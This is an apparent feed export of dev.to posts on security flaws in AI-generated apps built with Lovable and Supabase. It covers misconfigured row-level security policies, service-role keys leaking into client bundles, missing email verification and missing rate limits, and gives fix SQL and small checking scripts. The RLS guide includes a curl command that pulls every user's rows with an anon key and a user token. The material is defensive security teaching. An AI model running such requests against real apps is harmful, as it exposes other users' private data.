&lt;/div&gt;



&lt;p&gt;This means any logged-in user can read every row in the table. Not just their own. Every user's data.&lt;/p&gt;

&lt;p&gt;The fix is one function call: &lt;code&gt;auth.uid() = user_id&lt;/code&gt; instead of &lt;code&gt;auth.role() = 'authenticated'&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;I wrote a &lt;a href="https://dev.to/solobillions/your-supabase-rls-is-probably-wrong-a-security-guide-for-vibe-coders-3l4e"&gt;full guide on checking and fixing this&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Supabase anon key + service role key in the JavaScript bundle
&lt;/h2&gt;

&lt;p&gt;Every Lovable app that uses Supabase ships the anon key in the client bundle. That part is expected and documented by Supabase.&lt;/p&gt;

&lt;p&gt;The problem: about 1 in 5 apps I scanned also had the &lt;strong&gt;service role key&lt;/strong&gt; in the client bundle. The service role key bypasses all RLS policies. If someone extracts it from your JavaScript (which takes about 30 seconds with DevTools), they have full read/write access to every table.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How to check:&lt;/strong&gt; Open your deployed app. View page source. Search for &lt;code&gt;eyJ&lt;/code&gt; (the start of a base64-encoded JWT). You should find exactly one key (the anon key). If you find two, the second is probably your service role key.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Move any server-side logic that uses the service role key into a Supabase Edge Function or server-side API route. Never import the service role key in client code.&lt;/p&gt;
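&lt;p&gt;The &lt;code&gt;eyJ&lt;/code&gt; check above is scriptable. A small Python sketch (the keys in the sample are fake) that counts distinct JWT-shaped strings in a page source or bundle you've already downloaded:&lt;/p&gt;

```python
import re

# JWTs are three base64url segments joined by dots, and they start with
# "eyJ" because the JSON prefix '{"' base64-encodes to "eyJ".
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")

def count_embedded_jwts(page_source: str) -> int:
    """Count distinct JWT-shaped strings in a client bundle or page source.

    One (the anon key) is expected in a Supabase app. Two or more deserves
    an immediate look: one of them may be the service role key.
    """
    return len(set(JWT_RE.findall(page_source)))

# Fake keys, standing in for a bundle that leaks the service role key.
bundle = (
    'const supabase = createClient(url, "eyJhbGciOi.eyJyb2xlIjoiYW5vbiJ9.c2ln");'
    'const admin = createClient(url, "eyJhbGciOi.eyJyb2xlIjoic2VydmljZSJ9.c2ln");'
)
print(count_embedded_jwts(bundle))  # 2 -- the second key is the red flag
```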

&lt;h2&gt;
  
  
  3. No email verification required
&lt;/h2&gt;

&lt;p&gt;Lovable apps typically set up Supabase Auth with email + password. The AI generates the signup flow, the login flow, and the protected routes.&lt;/p&gt;

&lt;p&gt;What it does not generate: email verification.&lt;/p&gt;

&lt;p&gt;This means anyone can sign up with any email address (including addresses they do not own) and immediately access the app. Combined with the RLS issue from #1, they can also read every other user's data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How to check:&lt;/strong&gt; Go to your Supabase dashboard &amp;gt; Authentication &amp;gt; Settings &amp;gt; Email. Look for "Enable email confirmations." If it is off, anyone can sign up with a fake email.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Enable email confirmations in Supabase. Then update your app's auth flow to handle the "check your email" state between signup and confirmation.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. API keys for third-party services in environment variables that get bundled
&lt;/h2&gt;

&lt;p&gt;This goes beyond Supabase. If your Lovable app uses OpenAI, Stripe, SendGrid, or any other service with an API key, check where that key lives.&lt;/p&gt;

&lt;p&gt;Lovable apps built with Vite expose any environment variable that starts with &lt;code&gt;VITE_&lt;/code&gt; to the client bundle. If your OpenAI key is stored as &lt;code&gt;VITE_OPENAI_API_KEY&lt;/code&gt;, it ships to every user's browser.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How to check:&lt;/strong&gt; Open DevTools &amp;gt; Sources &amp;gt; find your compiled JS files &amp;gt; search for your key prefix or the string &lt;code&gt;sk-&lt;/code&gt; (OpenAI) or &lt;code&gt;SG.&lt;/code&gt; (SendGrid).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Any key that costs money when called (OpenAI, Stripe secret key, SendGrid) must live on the server side only. Create a Supabase Edge Function or backend API that proxies the request.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. No rate limiting on authentication endpoints
&lt;/h2&gt;

&lt;p&gt;None of the 30 apps I scanned had rate limiting on their auth endpoints. This means an attacker can attempt unlimited password guesses, send unlimited password reset emails, or create unlimited accounts.&lt;/p&gt;

&lt;p&gt;Supabase has built-in rate limiting for auth, but the defaults are generous and the AI never tightens them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How to check:&lt;/strong&gt; Open Supabase dashboard &amp;gt; Authentication &amp;gt; Rate Limits. Look at the current settings.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Set rate limits that make sense for your app. For most apps: 5 signups per hour per IP, 10 login attempts per hour per IP, 3 password reset emails per hour per email.&lt;/p&gt;
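&lt;p&gt;Supabase enforces these limits server-side, so for auth endpoints this is dashboard configuration, not code you write. But the mechanics are worth seeing. A minimal sliding-window limiter sketch in Python, assuming you wanted to add your own layer in front of a custom endpoint (illustrative only; a production limiter keeps state in shared storage like Redis, not process memory):&lt;/p&gt;

```python
import time
from collections import defaultdict

class SlidingWindowLimiter:
    """Minimal sliding-window rate limiter, e.g. 10 login attempts/hour per IP."""

    def __init__(self, limit: int, window_seconds: float):
        self.limit = limit
        self.window = window_seconds
        self.hits = defaultdict(list)  # key -> timestamps of recent attempts

    def allow(self, key: str, now=None) -> bool:
        """Record an attempt for `key`; return False once the window is full."""
        now = time.monotonic() if now is None else now
        recent = [t for t in self.hits[key] if now - t < self.window]
        self.hits[key] = recent
        if len(recent) >= self.limit:
            return False
        recent.append(now)
        return True

# 3 password-reset emails per hour per address, as suggested above.
limiter = SlidingWindowLimiter(limit=3, window_seconds=3600)
results = [limiter.allow("user@example.com", now=t) for t in (0, 1, 2, 3)]
print(results)  # [True, True, True, False]
```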

&lt;h2&gt;
  
  
  Why these keep appearing
&lt;/h2&gt;

&lt;p&gt;The pattern is consistent: Lovable (and other AI tools) optimize for "the feature works" not "the feature is secure." Every one of these apps worked correctly. Users could sign up, log in, and use every feature. The security gaps were invisible during normal use.&lt;/p&gt;

&lt;p&gt;The AI does not add security controls unless you specifically prompt it to. And most builders do not know what to prompt for because they are not security experts. That is the whole point of vibe coding.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do about it
&lt;/h2&gt;

&lt;p&gt;If you have a Lovable app with real users:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Run the Supabase RLS check from issue #1 right now. It takes 2 minutes.&lt;/li&gt;
&lt;li&gt;Search your client bundle for &lt;code&gt;eyJ&lt;/code&gt; and count the JWTs. If there is more than one, you have a problem.&lt;/li&gt;
&lt;li&gt;Search for &lt;code&gt;sk-&lt;/code&gt; and &lt;code&gt;SG.&lt;/code&gt; in your bundle.&lt;/li&gt;
&lt;li&gt;Check your auth email verification setting.&lt;/li&gt;
&lt;li&gt;Review your rate limits.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;We built free scanning tools at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt; that automate checks 2-4. No signup required.&lt;/p&gt;

&lt;p&gt;If you want a human review covering all five issues plus business logic, auth flows, and API design, our &lt;a href="https://notelon.ai/services/audit" rel="noopener noreferrer"&gt;$99 security audit&lt;/a&gt; covers 50+ checks with a PDF report and fix instructions.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Part of the &lt;a href="https://dev.to/solobillions"&gt;Vibe Coding Security series&lt;/a&gt;. Updated weekly with new findings.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>lovable</category>
      <category>security</category>
      <category>vibecoding</category>
      <category>webdev</category>
    </item>
    <item>
      <title>Your Supabase RLS Is Probably Wrong: A Security Guide for Vibe Coders</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Sun, 29 Mar 2026 21:36:30 +0000</pubDate>
      <link>https://dev.to/solobillions/your-supabase-rls-is-probably-wrong-a-security-guide-for-vibe-coders-3l4e</link>
      <guid>https://dev.to/solobillions/your-supabase-rls-is-probably-wrong-a-security-guide-for-vibe-coders-3l4e</guid>
      <description>&lt;p&gt;You built your app with Lovable, Cursor, or Bolt. You connected Supabase. You enabled Row Level Security because the docs said to.&lt;/p&gt;

&lt;p&gt;Your RLS is probably wrong.&lt;/p&gt;

&lt;p&gt;I have scanned dozens of vibe-coded apps this month. The same RLS mistake appears in roughly 80% of them. The app works perfectly. Every feature functions. Users can sign up, create data, view their data. And every user can also view every other user's data.&lt;/p&gt;

&lt;h2&gt;
  
  
  The mistake
&lt;/h2&gt;

&lt;p&gt;Here is what AI-generated RLS policies typically look like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can view data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt;
&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="k"&gt;role&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'authenticated'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This policy says: if you are logged in, you can read all rows. Every row. Every user's data.&lt;/p&gt;

&lt;p&gt;Here is what it should say:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can view their own data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt;
&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The difference is a single function call. &lt;code&gt;auth.role()&lt;/code&gt; checks whether someone is logged in. &lt;code&gt;auth.uid()&lt;/code&gt; checks whether the logged-in user owns that specific row. A few characters of difference in the code, a total difference in security.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why AI tools get this wrong
&lt;/h2&gt;

&lt;p&gt;When you prompt Lovable or Cursor to "add authentication to my app," the AI does exactly what you asked. It adds login and signup. It creates the database tables. It enables RLS.&lt;/p&gt;

&lt;p&gt;But the AI optimizes for "works correctly" not "works securely." The policy it generates passes every test: authenticated users can read data, unauthenticated users cannot. That is technically correct. It is also a data breach.&lt;/p&gt;

&lt;p&gt;Nobody prompts the AI to add ownership checks. The AI does not add them unprompted. The result is an app that looks secure but leaks data between users.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to check yours in 2 minutes
&lt;/h2&gt;

&lt;p&gt;Open the Supabase SQL editor and run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;
  &lt;span class="n"&gt;schemaname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;tablename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;policyname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;qual&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;pg_policies&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;schemaname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'public'&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;tablename&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Look at the &lt;code&gt;qual&lt;/code&gt; column. If you see &lt;code&gt;(auth.role() = 'authenticated'::text)&lt;/code&gt; on any table that stores user data, you have the problem.&lt;/p&gt;

&lt;p&gt;If you see &lt;code&gt;(auth.uid() = user_id)&lt;/code&gt; or something similar with &lt;code&gt;auth.uid()&lt;/code&gt;, you are probably fine for that table.&lt;/p&gt;
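&lt;p&gt;If you have many tables, you can triage the &lt;code&gt;qual&lt;/code&gt; column mechanically. A heuristic Python sketch (it only catches the exact pattern discussed here, not every bad policy, so treat a pass as "not obviously broken" rather than "secure"):&lt;/p&gt;

```python
import re

def policy_is_risky(qual) -> bool:
    """Flag RLS quals that only check the role, never row ownership.

    Heuristic: a qual mentioning auth.uid() is treated as ownership-aware;
    one relying solely on auth.role() = 'authenticated' is flagged.
    """
    if qual is None:
        return True  # no USING clause at all
    has_ownership = "auth.uid()" in qual
    role_only = re.search(r"auth\.role\(\)\s*=\s*'authenticated'", qual)
    return bool(role_only) and not has_ownership

print(policy_is_risky("(auth.role() = 'authenticated'::text)"))  # True
print(policy_is_risky("(auth.uid() = user_id)"))                 # False
```

&lt;p&gt;Feed it the &lt;code&gt;qual&lt;/code&gt; values from the &lt;code&gt;pg_policies&lt;/code&gt; query above and review every flagged table by hand.&lt;/p&gt;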

&lt;h2&gt;
  
  
  The fix
&lt;/h2&gt;

&lt;p&gt;For each table that stores user-specific data:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Drop the broken policy&lt;/span&gt;
&lt;span class="k"&gt;DROP&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can view data"&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Create the correct one&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can view their own data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt;
&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;-- Do the same for INSERT, UPDATE, DELETE&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can insert their own data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;INSERT&lt;/span&gt;
&lt;span class="k"&gt;WITH&lt;/span&gt; &lt;span class="k"&gt;CHECK&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can update their own data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;UPDATE&lt;/span&gt;
&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can delete their own data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;DELETE&lt;/span&gt;
&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Replace &lt;code&gt;user_data&lt;/code&gt; with your actual table name. Replace &lt;code&gt;user_id&lt;/code&gt; with whatever column stores the user's UUID in that table.&lt;/p&gt;

&lt;h2&gt;
  
  
  Common variations that are also broken
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Service role bypass:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="k"&gt;role&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'service_role'&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="k"&gt;role&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'authenticated'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Still broken. The &lt;code&gt;service_role&lt;/code&gt; clause is redundant (the service role key bypasses RLS entirely), and the second clause still lets any authenticated user read everything.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;True for all:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No restriction at all. Anon users can read everything. This appears more often than you would expect.&lt;/p&gt;
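&lt;p&gt;&lt;code&gt;USING (true)&lt;/code&gt; is only legitimate for genuinely public content, and even then it should be scoped. A sketch, assuming a hypothetical &lt;code&gt;posts&lt;/code&gt; table with a &lt;code&gt;published&lt;/code&gt; flag:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- Public read access, limited to rows explicitly marked published
CREATE POLICY "Anyone can read published posts"
ON public.posts
FOR SELECT
USING (published = true);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;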

&lt;p&gt;&lt;strong&gt;Missing policies entirely:&lt;/strong&gt;&lt;br&gt;
Some tables have RLS enabled but zero policies. This blocks all access (Supabase defaults to deny), which is safer than the wrong policy. The danger is what usually happens next: when queries stop working, the developer "fixes" the app by disabling RLS on the table entirely, removing all protection.&lt;/p&gt;
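&lt;p&gt;You can spot this case from the catalogs too. A sketch that lists public tables with RLS enabled but zero policies:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- Tables where RLS is on but no policy exists: every query is denied
SELECT c.relname AS tablename
FROM pg_class c
JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE n.nspname = 'public'
  AND c.relkind = 'r'
  AND c.relrowsecurity
  AND NOT EXISTS (
    SELECT 1 FROM pg_policies p
    WHERE p.schemaname = 'public'
      AND p.tablename = c.relname
  );
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
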
&lt;h2&gt;
  
  
  Tables that need ownership checks
&lt;/h2&gt;

&lt;p&gt;Not every table needs &lt;code&gt;auth.uid() = user_id&lt;/code&gt;. Here is a quick breakdown:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Needs ownership check:&lt;/strong&gt; profiles, user_data, orders, messages, documents, settings, anything with personal or financial data&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does not need ownership check:&lt;/strong&gt; public content (blog posts set to published), lookup tables (countries, categories), app configuration&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Needs role-based check:&lt;/strong&gt; admin panels, moderation queues, shared team data&lt;/p&gt;
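&lt;p&gt;A role-based policy usually routes through a membership table rather than comparing &lt;code&gt;auth.uid()&lt;/code&gt; to the row directly. A sketch, where &lt;code&gt;documents&lt;/code&gt;, &lt;code&gt;team_members&lt;/code&gt;, and &lt;code&gt;team_id&lt;/code&gt; are placeholder names for your own schema:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- Shared team data: visible to any member of the owning team
CREATE POLICY "Team members can view team documents"
ON public.documents
FOR SELECT
USING (
  team_id IN (
    SELECT team_id FROM public.team_members
    WHERE user_id = auth.uid()
  )
);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
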
&lt;h2&gt;
  
  
  What happens when this is wrong
&lt;/h2&gt;

&lt;p&gt;A user creates an account on your app. They open browser DevTools. They go to the Network tab. They find a Supabase request. They copy the URL and anon key (both visible in the JavaScript bundle). They run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="s1"&gt;'https://your-project.supabase.co/rest/v1/user_data?select=*'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"apikey: your-anon-key"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Authorization: Bearer their-jwt-token"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every user's data comes back. Names, emails, financial data, health data, whatever you store. One curl command.&lt;/p&gt;

&lt;h2&gt;
  
  
  Beyond RLS
&lt;/h2&gt;

&lt;p&gt;RLS is the most common issue but not the only one. Other things to check:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;API keys in your JS bundle.&lt;/strong&gt; Open your deployed site, view source, search for &lt;code&gt;eyJ&lt;/code&gt;. Your Supabase anon key will be there (expected). Anything else should not be.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Auth email verification.&lt;/strong&gt; Is it required? If not, anyone can sign up with any email and start querying.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Rate limiting.&lt;/strong&gt; Are your auth endpoints rate-limited? If not, brute force attacks work.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Storage bucket policies.&lt;/strong&gt; If you use Supabase Storage, the bucket policies have the same RLS problem. Check them separately.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
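&lt;p&gt;For point 4, storage policies live in the same catalog under the &lt;code&gt;storage&lt;/code&gt; schema, so the same two-minute check applies:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- Review Storage bucket policies the same way as table policies
SELECT policyname, cmd, qual
FROM pg_policies
WHERE schemaname = 'storage'
  AND tablename = 'objects';
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;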

&lt;p&gt;We built free security tools specifically for this at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt;. The code scanner checks for exposed keys and common misconfigurations. No signup required.&lt;/p&gt;

&lt;p&gt;If you want a deeper review covering all of the above plus business logic, auth flows, and API design, our &lt;a href="https://notelon.ai/services/audit" rel="noopener noreferrer"&gt;$99 security audit&lt;/a&gt; covers 50+ checks with a PDF report.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Part of the &lt;a href="https://dev.to/solobillions"&gt;Vibe Coding Security series&lt;/a&gt;. More guides on Lovable, Cursor, Bolt, and Windsurf security at &lt;a href="https://notelon.ai/report" rel="noopener noreferrer"&gt;notelon.ai/report&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>supabase</category>
      <category>security</category>
      <category>vibecoding</category>
      <category>webdev</category>
    </item>
    <item>
      <title>The UK Government Just Called Vibe Coding Security Risks 'Intolerable'</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Sun, 29 Mar 2026 13:27:58 +0000</pubDate>
      <link>https://dev.to/solobillions/the-uk-government-just-called-vibe-coding-security-risks-intolerable-14hd</link>
      <guid>https://dev.to/solobillions/the-uk-government-just-called-vibe-coding-security-risks-intolerable-14hd</guid>
      <description>&lt;p&gt;The head of the UK's National Cyber Security Centre (NCSC) stood up at RSA Conference last week and called the security risks from AI-generated code "intolerable."&lt;/p&gt;

&lt;p&gt;The same week, Cursor's CEO warned that vibe coding builds "shaky foundations" that eventually "crumble."&lt;/p&gt;

&lt;p&gt;The same week, someone compromised LiteLLM's PyPI package and got 47,000 poisoned downloads in 46 minutes.&lt;/p&gt;

&lt;p&gt;These aren't separate stories. They're the same story.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the NCSC actually said
&lt;/h2&gt;

&lt;p&gt;The NCSC CEO called for international cooperation on vibe coding security. Not guidelines. Not best practices. International cooperation. That's the language governments use when they think a problem is bigger than any one country can solve.&lt;/p&gt;

&lt;p&gt;Why? Because vibe-coded apps are shipping to production at a rate that outpaces any security review process. The code compiles. The tests pass. The app works. The security is broken.&lt;/p&gt;

&lt;h2&gt;
  
  
  What "broken security" actually looks like
&lt;/h2&gt;

&lt;p&gt;We've been scanning vibe-coded apps for months. The pattern is the same every time:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Supabase RLS disabled or misconfigured.&lt;/strong&gt; Default Lovable setup ships with Row Level Security that checks "is this user authenticated?" instead of "does this user own this data?" Any logged-in user can read any other user's records. For a todo app, whatever. For a health app with 8,700 users storing body metrics? That's a data breach waiting to happen.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;API keys in client-side JavaScript bundles.&lt;/strong&gt; Vite and Next.js handle environment variables differently. Vibe coders rarely know the difference. We regularly find Supabase anon keys, Stripe publishable keys, and occasionally secret keys sitting in the JS bundle anyone can read with browser DevTools.&lt;/p&gt;

